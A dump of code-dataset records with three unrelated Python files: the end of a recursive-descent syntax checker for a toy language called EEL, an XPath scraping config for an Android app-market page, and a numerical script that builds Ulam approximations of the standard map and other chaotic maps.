EXPRESSION()\n\n # No need to display an error message. If there was no return Token we wouldn't be here.\n\n# -- ::= PRINT -- #\ndef PRINT_STAT():\n\n if sys.argv[2] == \"-verbose\" : print(\"22.\")\n\n global ret_token\n\n if ret_token == token_dict[\"printTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPRINT_STAT\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** PRINT_STAT ==> EXPRESSION ***\")\n EXPRESSION()\n # No need to display an error message. If there was no print Token we wouldn't be here.\n\n# -- ::= ( ) -- #\ndef ACTUALPARS():\n\n if sys.argv[2] == \"-verbose\" : print(\"23.\")\n\n global ret_token\n\n if ret_token == token_dict[\"lbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARS\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** ACTUALPARS ==> ACTUALPARLIST ***\")\n ACTUALPARLIST()\n\n if ret_token == token_dict[\"rbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARS\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the parameters right bracket character ')'\n is required\n --Instead you forgot to type it or typed something else!\n \n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n ACTUALPARS()\"\"\" %(line))\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --To start declaring the parameters left bracket character '('\n is required\n --Instead you forgot to type it or typed something else!\n \n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n ACTUALPARS()\"\"\" %(line))\n exit()\n\n# -- ::= (, )* | e -- #\ndef ACTUALPARLIST():\n\n if sys.argv[2] == \"-verbose\" : print(\"24.\")\n\n global ret_token\n\n # Sneak Peek\n if ret_token == token_dict[\"inTK\"] or ret_token == token_dict[\"inoutTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"*** ACTUALPARLIST ==> ACTUALPARITEM ***\")\n ACTUALPARITEM()\n\n while ret_token == token_dict[\"commaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARLIST\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** ACTUALPARLIST ==> ACTUALPARITEM ***\")\n ACTUALPARITEM()\n\n # e : Not defining an actual parameter is acceptable.\n\n# -- ::= IN | INOUT ID -- #\ndef ACTUALPARITEM():\n\n if sys.argv[2] == \"-verbose\" : print(\"25.\")\n\n global ret_token\n\n if ret_token == token_dict[\"inTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARITEM\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** ACTUALPARITEM ==> EXPRESSION ***\")\n EXPRESSION()\n\n elif ret_token == token_dict[\"inoutTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARITEM\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tACTUALPARITEM\\t\" + lex_unit)\n lex()\n\n else: \n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Passing by reference without declaring variable name detected! \n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n ACTUALPARITEM()\"\"\" %(line))\n\n exit()\n\n# -- ::= ( OR )* -- #\ndef CONDITION():\n\n if sys.argv[2] == \"-verbose\" : print(\"26.\")\n\n global ret_token \n\n if sys.argv[2] == \"-verbose\" : print(\"*** CONDITION ==> BOOLTERM ***\")\n BOOLTERM()\n\n while ret_token == token_dict[\"orTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tCONDITION\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** CONDITION ==> BOOLTERM ***\")\n BOOLTERM()\n\n# -- ::= ( AND )* -- #\ndef BOOLTERM():\n\n if sys.argv[2] == \"-verbose\" : print(\"27.\")\n\n global ret_token\n\n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLTERM ==> BOOLFACTOR ***\")\n BOOLFACTOR()\n\n while ret_token == token_dict[\"andTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLTERM\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLTERM ==> BOOLFACTOR ***\")\n BOOLFACTOR()\n\n# -- ::= NOT [ ] | [ ] | \n# | TRUE | FALSE -- #\ndef BOOLFACTOR():\n \n if sys.argv[2] == \"-verbose\" : print(\"28.\")\n\n global ret_token\n \n if ret_token == token_dict[\"notTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"blbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> CONDITION ***\")\n CONDITION()\n\n if ret_token == token_dict[\"brbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring a condition you have to put ']'\n --Instead you forgot to type it or typed something else!\n ---Example: not [a operator b]\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n BOOLFACTOR()\"\"\" %(line))\n\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Before declaring a condition you have to put '['\n --Instead you forgot to type it or typed something else!\n ---Example: not [a operator b]\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n BOOLFACTOR()\"\"\" %(line))\n\n exit()\n\n elif ret_token == token_dict[\"blbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> CONDITION ***\")\n CONDITION()\n\n if ret_token == token_dict[\"brbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring a condition you have to put ']'\n --Instead you forgot to type it or typed something else!\n ---Example: not [a operator b]\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n BOOLFACTOR()\"\"\" %(line))\n\n exit()\n\n # Sneak Peek\n elif ret_token == token_dict[\"plusTK\"] or ret_token == token_dict[\"minusTK\"] or ret_token == token_dict[\"numberTK\"] or ret_token == token_dict[\"lbrTK\"] or ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> EXPRESSION ***\")\n EXPRESSION()\n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> RELATIONAL_OPER ***\")\n RELATIONAL_OPER()\n if sys.argv[2] == \"-verbose\" : print(\"*** BOOLFACTOR ==> EXPRESSION ***\")\n EXPRESSION()\n\n elif ret_token == token_dict[\"trueTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"falseTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tBOOLFACTOR\\t\" + lex_unit)\n lex()\n\n# -- ::= ( )* -- #\ndef EXPRESSION(): \n\n if sys.argv[2] == \"-verbose\" : print(\"29.\")\n\n global ret_token\n\n if sys.argv[2] == \"-verbose\" : print(\"*** EXPRESSION ==> OPTIONAL_SIGN ***\")\n OPTIONAL_SIGN()\n if sys.argv[2] == \"-verbose\" : print(\"*** EXPRESSION ==> TERM ***\")\n TERM()\n\n #Sneak Peek\n while( ret_token == token_dict[\"plusTK\"] or ret_token == token_dict[\"minusTK\"] ):\n\n if sys.argv[2] == \"-verbose\" : print(\"*** EXPRESSION ==> ADD_OPER ***\")\n ADD_OPER()\n if sys.argv[2] == \"-verbose\" : print(\"*** EXPRESSION ==> TERM ***\")\n TERM()\n\n# -- ::= ( )* -- #\ndef TERM():\n\n if sys.argv[2] == \"-verbose\" : print(\"30.\")\n\n global ret_token\n\n if sys.argv[2] == \"-verbose\" : print(\"*** TERM ==> FACTOR ***\")\n FACTOR()\n\n #Sneak Peek\n while(ret_token == token_dict[\"mulTK\"] or ret_token == token_dict[\"divTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"*** TERM ==> MUL_OPER ***\")\n MUL_OPER()\n if sys.argv[2] == \"-verbose\" : print(\"*** TERM ==> FACTOR ***\")\n FACTOR()\n\n# -- ::= COSTANT | ( ) | ID -- #\ndef FACTOR():\n\n if sys.argv[2] == \"-verbose\" : print(\"31.\")\n\n global ret_token\n\n if ret_token == token_dict[\"numberTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"lbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n EXPRESSION()\n\n if ret_token == token_dict[\"rbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n lex()\n\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring an expression you have to put ')'\n --Instead you forgot to type it or typed something else!\n ---Example: ( expression )\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FACTOR()\"\"\" %(line))\n\n exit()\n\n elif ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFACTOR\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FACTOR ==> IDTAIL ***\")\n IDTAIL()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Invalid FACTOR used!\n ---[NOTE]: Read EEL's documentation file to see which\n options are available for factor usage.\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FACTOR()\"\"\" %(line))\n\n exit()\n\n# -- ::= e | -- #\ndef IDTAIL():\n\n if sys.argv[2] == \"-verbose\" : print(\"32.\")\n\n global ret_token\n\n if ret_token == token_dict[\"lbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"*** IDTAIL ==> ACTUALPARS ***\")\n ACTUALPARS()\n\n # e : No statements after an ID is acceptable.\n\n# -- ::= = | <= | >= | > | < | <> -- #\ndef RELATIONAL_OPER():\n\n if sys.argv[2] == \"-verbose\" : print(\"33.\")\n\n global ret_token \n\n if ret_token == token_dict[\"eqTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"leqTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"greqTK\"]:\n \n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"greaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"lessTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"difTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tRELATIONAL_OPER\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Invalid RELATIONAL OPERATOR used!\n ---[NOTE]: Read EEL's documentation file to see which\n options are available for relational op usage!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n RELATIONAL_OPER()\"\"\" %(line))\n exit()\n\n# -- ::= + | - -- #\ndef ADD_OPER():\n\n if sys.argv[2] == \"-verbose\" : print(\"34.\")\n\n global ret_token\n\n if ret_token == token_dict[\"plusTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tADD_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"minusTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tADD_OPER\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Invalid ADDITION OPERATOR used!\n ---[NOTE]: Read EEL's documentation file to see which\n options are available for add op usage!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n MUL_OPER()\"\"\" %(line))\n exit()\n\n# -- ::= * | / -- #\ndef MUL_OPER():\n\n if sys.argv[2] == \"-verbose\" : print(\"35.\")\n\n global ret_token\n\n if ret_token == token_dict[\"mulTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tMUL_OPER\\t\" + lex_unit)\n lex()\n\n elif ret_token == token_dict[\"divTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tMUL_OPER\\t\" + lex_unit)\n lex()\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Invalid MULTIPLICATION OPERATOR used!\n ---[NOTE]: Read EEL's documentation file to see which\n options are available for mul op usage!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n MUL_OPER()\"\"\" %(line))\n exit()\n\n# -- ::= e | -- #\ndef OPTIONAL_SIGN():\n\n if sys.argv[2] == \"-verbose\" : print(\"36.\")\n\n global ret_token\n\n if ret_token == token_dict[\"plusTK\"] or ret_token == token_dict[\"minusTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"*** OPTIONAL_SIGN ==> ADD_OPER ***\") \n ADD_OPER()\n\n # e : Not using an add operator is acceptable.\n\n\n# *********** [MAIN FUNCTION] *********** #\nif __name__ == '__main__':\n\n try:\n \n if sys.argv[2] != \"-verbose\" and sys.argv[2] != \"-skip\" : raise IndexError\n if \".eel\" in sys.argv[1] : raise IOError\n\n global code \n #global line\n eel_source_code = sys.argv[1]\n code = open(eel_source_code+\".eel\")\n\n # Lexical Test #\n if sys.argv[2] == \"-verbose\" : print(\" ===========> START OF LEX !! <=========== \")\n a = lex()\n verbose_iterator = 0;\n if sys.argv[2] == \"-verbose\" : print(str(verbose_iterator)+\".\"+\" \"+ str(a) + \"\\t\\t\" + lex_unit)\n\n while(a != token_dict[\"eofTK\"]):\n\n a = lex()\n verbose_iterator = verbose_iterator + 1;\n if sys.argv[2] == \"-verbose\" : print(str(verbose_iterator)+\".\"+\" \"+ str(a) + \"\\t\\t\" + lex_unit)\n\n if sys.argv[2] == \"-skip\" : print(\"\\n\\tLEX Test:\\t[ OK! ]\")\n \n # Reset the File Pointer and Line Counter\n code.seek(0,0)\n line = 1 \n\n # Syntax Test #\n \n lex()\n PROGRAM()\n if sys.argv[2] == \"-skip\" : print(\"\\tSYN Test:\\t[ OK! ]\\n\")\n\n code.close()\n\n except IndexError: \n print(\"\"\"\nUsage: python EELC.py [source file name] [options]\nWhere possible options include:\n\n -verbose\\t Output messages about what the compiler is doing. \n \\t Redirection is reccomended due to wealth of text messages.\n \\t [ e.g >python EELC.py example -verbose > output.txt ] \n\n -skip \\t Output messages only for the progression of the analysis.\n \\t Outputs \"OK!\" messages on success.\n \"\"\")\n except IOError:\n print(\"\"\"\nUsage: python EELC.py [source file name] [options]\n \n - \".eel\" Ending is not required on [source file name]!\n\n - [ e.g >python EELC.py example -skip] )\n \"\"\")\n\n","repo_name":"NikosDelijohn/EEL-Compiler","sub_path":"EELC_Lexsyn.py","file_name":"EELC_Lexsyn.py","file_ext":"py","file_size_in_byte":64359,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"} +{"seq_id":"9294820694","text":"#!/bin/env python\n#-*- coding:utf-8 -*-\n\nimport re\nfrom baseclass import baseclass\n\nclass HiApkItemConfig(baseclass):\n domain = \"apk.hiapk.com\"\n\n def __init__ (self):\n self.config = {\n \"app_id\": {\n \"select\": \"//a[@class=\\\"linkbtn d1\\\"]/@href\",\n \"result\":0,\n \"additional\": self.post_appid_hiapk,\n },\n\n \"app_version\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftVersionName\\\"]/text()\",\n \"result\": 0,\n },\n\n \"market\": {\n # pass in\n },\n\n \"name\": {\n \"select\": '//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftName\\\"]/text()' ,\n \"result\": 0,\n },\n\n \"size\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftSize\\\"]/text()\",\n \"result\": 0,\n },\n\n \"language\": {\n \"select\": '//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftName\\\"]/text()' ,\n \"result\": 0,\n \"additional\": self.post_lang_hiapk,\n },\n\n \"package_name\": {\n # cannot found, parse by decompilating\n },\n\n \"developer\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftDeveloper\\\"]/text()\",\n \"result\": 0,\n },\n\n \"update_time\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftPublishTime\\\"]/text()\",\n \"result\": 0,\n },\n\n \"description\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_Description\\\"]/text()\",\n \"result\": 0,\n },\n\n \"category_general\": {\n # pass in\n },\n\n \"category_detail\": {\n \"select\": \"//span[@id=\\\"ctl00_AndroidMaster_Content_Soft_CurrentCategory\\\"]/text()\",\n \"result\": 0,\n },\n\n \"icon\": {\n \"select\": \"//div[@class=\\\"detail_content\\\"]/div[1]/div[1]/img/@src\",\n \"result\": 0\n },\n\n \"images\": {\n \"select\": \"//div[@class=\\\"screenimg\\\"]//img/@src\",\n },\n\n \"comment_url\": {\n \"select\": \"//input[@id=\\\"PublishSoft_ApkId\\\"]/@value | //input[@id=\\\"PublishSoft_SoftCode\\\"]/@value\",\n \"result\":1000,\n \"additional\": self.post_commenturl_hiapk,\n },\n\n \"package_url\": {\n \"select\": \"//a[@class=\\\"linkbtn d1\\\"]/@href\",\n \"result\":1000,\n \"additional\": self.post_packageurl_hiapk,\n },\n\n \"url\": {\n # pass in\n },\n\n \"related_app\": {\n \"select\": \"//div[@id=\\\"relatedSoftBox\\\"]//dt/a/text()\",\n },\n\n \"os_support_version\": {\n \"select\": \"//label[@id=\\\"ctl00_AndroidMaster_Content_Apk_SoftSuitSdk\\\"]/text()\",\n \"result\":0,\n },\n\n #\"price\": {\n # \"select\": \"//ul[@id=\\\"detail_line_ul\\\"]/li[6]/span/text()\",\n # \"result\":0,\n # \"additional\": self.post_price_anzh,\n #},\n\n #\"email\": {\n # \"select\": \"//ul[@id=\\\"detail_line_ul\\\"]/li[6]/text()\",\n # \"result\":0,\n # \"additional\": self.post_price_anzh,\n #},\n #\"devpage\": {\n # \"select\": \"//ul[@id=\\\"detail_line_ul\\\"]/li[6]/text()\",\n # \"result\":0,\n # \"additional\": self.post_price_anzh,\n #},\n }\n\n def post_appid_hiapk (self, val_raw):\n val = re.findall(r'[0-9].*[0-9]', val_raw, re.M)[0]\n return val\n\n def post_lang_hiapk (self, val_raw):\n if len (val_raw.encode (\"utf-8\")) != len (val_raw):\n return \"ch\"\n else:\n return \"en\"\n\n def post_commenturl_hiapk (self, val_raw):\n return val_raw\n\n def post_packageurl_hiapk (self, val_raw):\n return val_raw\n","repo_name":"coolyinger/crawler","sub_path":"market/HiApkItem.py","file_name":"HiApkItem.py","file_ext":"py","file_size_in_byte":4492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"36863705338","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Sep 15 17:36:34 2022\n\n@author: tomasnotenson\n\"\"\"\n# import os\n\nfrom qutip import *\nfrom time import time\nfrom numba import jit\n# importing \"cmath\" for complex number operations\nfrom cmath import phase\nfrom random import random\nimport seaborn as sns\nfrom scipy.stats import norm, multivariate_normal\nfrom scipy.linalg import eig\nimport scipy.sparse as ss\nfrom scipy.sparse.linalg import eigs\nimport numpy as np\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm # customisable progressbar decorator for iterators\n# import seaborn as sb\n# from sklearn.linear_model import LinearRegression #Regresión Lineal con scikit-learn\n\nplt.rcParams.update({\n\"text.usetex\": True,\n\"font.family\": \"sans-serif\",\n\"font.sans-serif\": [\"Helvetica\"], \"font.size\": 16})\n\ndpi = 2*np.pi\n\n@jit\ndef standard_map(q,p,K):\n '''\n One iteration of standard map.\n (q,p) -standard-map-> (qf,pf)\n\n Parameters\n ----------\n q : float\n initial position value\n p : float\n initial momentum value\n K : float\n kick amplitude. chaos parameter\n\n Returns\n -------\n qf : float\n final position value\n pf : float\n final momentum value\n\n '''\n pf = (p + K/(dpi)*np.sin(dpi*q))%1\n qf = (q + pf)%1\n return qf, pf\n\n@jit\ndef standard_map_absorption(q,p,K,a=2):\n pf = (p + K*np.sin(q+p/2))*(a*K)-a*K/2\n qf = (q + (p+pf)/2)%dpi\n \n # assert (-a*K/2<=pf and pf<=a*K/2), 'no está en el intervalo permitido [-aK/2,aK/2]'\n \n return qf, pf\n\n@jit\ndef standard_map_dissipation(q,p,K,eta=0.3):\n pf = (p + K*np.sin(q))%(8*np.pi)-4*np.pi\n qf = (q + pf)%(dpi)\n \n assert (-4*np.pi<=pf and pf<=4*np.pi), 'no está en el intervalo [-4pi,4pi]'\n \n return qf, pf\n\n@jit\ndef Harper_map(q,p,K):\n pf = (p-K*np.sin(dpi*q))%1\n qf = (q+K*np.sin(dpi*pf))%1\n return qf, pf \n\n@jit\n# probar con K = 0.01, 0.02\ndef perturbed_cat_map(q,p,K):\n pf = (p + q - dpi*K*np.sin(dpi*q))%1\n qf = (q + pf + dpi*K*np.sin(dpi*pf))%1\n return qf, pf\n\n@jit\ndef CI(qj,pj,paso):\n '''\n Take random (q,p) values in cell of width \"paso\"\n\n Parameters\n ----------\n qj : float\n minimum value of position in cell\n pj : float\n minimum value of momentum in cell\n paso : float\n width of cell. In gral, paso=1/N\n\n Returns\n -------\n q : float\n random position in cell\n p : float\n random momentum in cell\n\n '''\n rq = np.random.uniform()*paso\n rp = np.random.uniform()*paso\n \n q = qj+rq\n p = pj+rp\n \n # print('CI', q,p)\n return q,p\n\n# @jit\n# def cae_en_celda(qf,pf,qi,pi,paso):\n# '''\n# Check if (qf,pf) is in cell or not\n\n# Parameters\n# ----------\n# qf : float\n# position to check\n# pf : float\n# momentum to check\n# qi : float\n# mininum position of cell\n# pi : float\n# mininum momentum of cell\n# paso : float\n# width of cell. In gral, paso=1/N\n\n# Returns\n# -------\n# cond : bool\n# True if (qf,pf) is in cell. False if not\n\n# '''\n \n# cond1 = (0<(qf-qi) and (qf-qi)1/2:\n # cont+=1\n \n # print(qf, pf, nqi, npi, i)\n \n S[i,j] += 1\n normaj[j] += 1\n for j in range(Nmitad):\n if normaj[j] != 0:\n S[:,j] /= normaj[j]\n # print(np.sum(S[:,j]))\n assert (np.sum(S[:,j]) - 1.0) < 1e-3, f'ojo con sum_i Sij = {np.sum(S[:,j])} para j={j}'\n # print(cont/Nc)\n return S\n\n@jit\ndef eigenvec_j_to_qp(eigenvector, mapa='normal'):\n '''\n Change representation of eigenvalues from cells to (q,p)\n\n Parameters\n ----------\n eigenvector : array_like\n state in cell representation.\n mapa : string, optional\n Map of interest. The default is 'normal'.\n\n Returns\n -------\n eig_res : array_like\n state in (q,p) representation.\n\n '''\n N = len(eigenvector)\n Nx = int(np.sqrt(N))\n paso = 1\n eig_res = np.zeros((Nx,Nx), dtype=np.complex_)\n for j in range(N):\n q,p = qp_from_j(j, Nx, paso, mapa)\n # print(int(q),int(p))\n eig_res[int(q),int(p)] = eigenvector[j]\n return eig_res\n# plot parameters\nplt.rcParams['text.usetex'] = True\n\nfont_size=20\nletter_size=22\nlabel_size=25\ntitle_font=28\nlegend_size=23\n\nfrom matplotlib import rc\nrc('font', family='serif', size=font_size)\nrc('text', usetex=True)\n\n\n\nmpl.rcParams['lines.linewidth'] = 2\nmpl.rcParams['axes.labelsize'] = label_size\nmpl.rcParams['xtick.minor.visible']=True\nmpl.rcParams['xtick.major.size']=6\nmpl.rcParams['xtick.minor.size']=3\nmpl.rcParams['xtick.major.width']=1.4\nmpl.rcParams['xtick.minor.width']=0.9\nmpl.rcParams['xtick.direction']='in'\n\nmpl.rcParams['ytick.minor.visible']=True\nmpl.rcParams['ytick.major.size']=6\nmpl.rcParams['ytick.minor.size']=3\nmpl.rcParams['ytick.major.width']=2.1\nmpl.rcParams['ytick.minor.width']=1.3\nmpl.rcParams['ytick.direction']='in'\n\nmpl.rcParams['ytick.direction']='in'\n\n\n\nmpl.rcParams['legend.fontsize']=legend_size\n\n\n\nimport matplotlib.ticker\nclass MyLocator(matplotlib.ticker.AutoMinorLocator):\n def __init__(self, n=2):\n super().__init__(n=n)\nmatplotlib.ticker.AutoMinorLocator = MyLocator \n\n\nmarker_sz = 10\nlocation='upper left'\nproperties={'size':12}\nwidth_plot=8\n\n\n\ndef get_axis_limits(ax, scalex=.1, scaley=.85):\n return (ax.get_xlim()[0] + (ax.get_xlim()[1]-ax.get_xlim()[0])*scalex, ax.get_ylim()[0]+(ax.get_ylim()[1]-ax.get_ylim()[0])*scaley)\n\ncolorlist=[plt.cm.brg(i) for i in np.linspace(0, 1, 6)]\n#%% simulation Ks\nNeff = 60\nruido = 1/(2*np.pi*Neff)#1/2**8#[0.00390625]#1/2**np.arange(1,3,2)*110 # abs\n \nmapa = 'normal'#'absortion'#'dissipation'#'normal'#'cat'#'Harper'#\nmethod = 'Ulam'#'one_trayectory'#\neta = 0.3\na = 2\ncx = 1\n\naxis = 'both'\nmodulo = 1\n\nKpaso = 0.8\nKs = np.arange(0,20.1,Kpaso)#0.971635406\n\nNc = int(1e3)#int(2.688e7)#int(1e8)#\n#\nk = 45\nfor ki in tqdm(range(len(Ks)), desc='loop K'):\n K = Ks[ki]\n Nx = int(cx*Neff)\n N = Nx**2\n \n print(f'N={Neff}d',f'e={ruido}')\n \n paso = 1/Nx\n \n if (mapa=='normal' or mapa=='absortion' or mapa=='cat' or mapa=='Harper'):\n if method=='one_trayectory':\n S = Ulam_one_trayectory(N, Nx, paso, Nc, K, mapa) \n elif method=='Ulam':\n S = Ulam(N=N, Nx=Nx, paso=paso, Nc=Nc, K=K, mapa=mapa, ruido=ruido, modulo=modulo, axis=axis)\n \n elif mapa=='dissipation':\n S = Ulam_one_trayectory(N, Nx, paso, Nc, K, mapa)\n\n # diagonalize operator\n t0=time()\n e, evec = eigs(S, k=k)\n eabs = np.abs(e)\n evec=evec[:,eabs.argsort()[::-1]]\n e = e[eabs.argsort()][::-1]\n t1=time()\n print(f'\\nDiagonalización: {t1-t0} seg')\n flag = f'Ulam_approximation_method{method}_mapa{mapa}_Sij_eigenvals_N{Neff}_ruido_abs{ruido}_axis{axis}_grilla{cx}N_K{K:1f}_Nc{Nc}'\n np.savez(flag+'.npz', e=e, evec=evec[:,:k])\n del S; del e; del evec;\n#%% simulation Ns\n# # Neff = 128\n# Ns = np.arange(55,91)\n# ruido = 1/2**8#[0.00390625]#1/2**np.arange(1,3,2)*110 # abs\n \n# mapa = 'normal'#'absortion'#'dissipation'#'normal'#'cat'#'Harper'#\n# method = 'Ulam'#'one_trayectory'#\n# cx = 1\n\n# Kpaso = 0\n# Ks = [19]\n\n# Nc = int(1e3)#int(2.688e7)#int(1e8)#\n# #\n# k = 45\n# for ni in tqdm(range(len(Ns)), desc='loop N'):\n# Neff = Ns[ni]\n# Nx = int(cx*Neff)\n# N = Nx**2\n \n# K = Ks[0]\n# # print(f'N={Neff}d',f'e={ruido}')\n \n# paso = 1/Nx\n \n# if (mapa=='normal' or mapa=='absortion' or mapa=='cat' or mapa=='Harper'):\n# if method=='one_trayectory':\n# S = Ulam_one_trayectory(N, Nx, paso, Nc, K, mapa) \n# elif method=='Ulam':\n# S = Ulam(N=N, Nx=Nx, paso=paso, Nc=Nc, K=K, mapa=mapa, ruido=ruido)\n \n# elif mapa=='dissipation':\n# S = Ulam_one_trayectory(N, Nx, paso, Nc, K, mapa)\n\n# # diagonalize operator\n# t0=time()\n# e, evec = eigs(S, k=k)\n# eabs = np.abs(e)\n# evec=evec[:,eabs.argsort()[::-1]]\n# e = e[eabs.argsort()][::-1]\n# t1=time()\n# print(f'\\nDiagonalización: {t1-t0} seg')\n# flag = f'Ulam_approximation_method{method}_mapa{mapa}_Sij_eigenvals_N{Neff}_ruido_abs{ruido}_grilla{cx}N_K{K:1f}_Nc{Nc}'\n# np.savez(flag+'.npz', e=e, evec=evec[:,:k])\n# del S; del e; del evec;\n#%% cambiar nombre de archivos\n# import os\n\n# Ns = np.arange(58,89)\n\n# for ni in range(len(Ns)):\n \n# # Absolute path of a file\n# old_name = f\"Ulam_approximation_methodUlam_mapanormal_Sij_eigenvals_N{Ns[ni]}_ruido_abs0.00390625_grilla1N_K18.000000_Nc1000.npz\"\n# new_name = 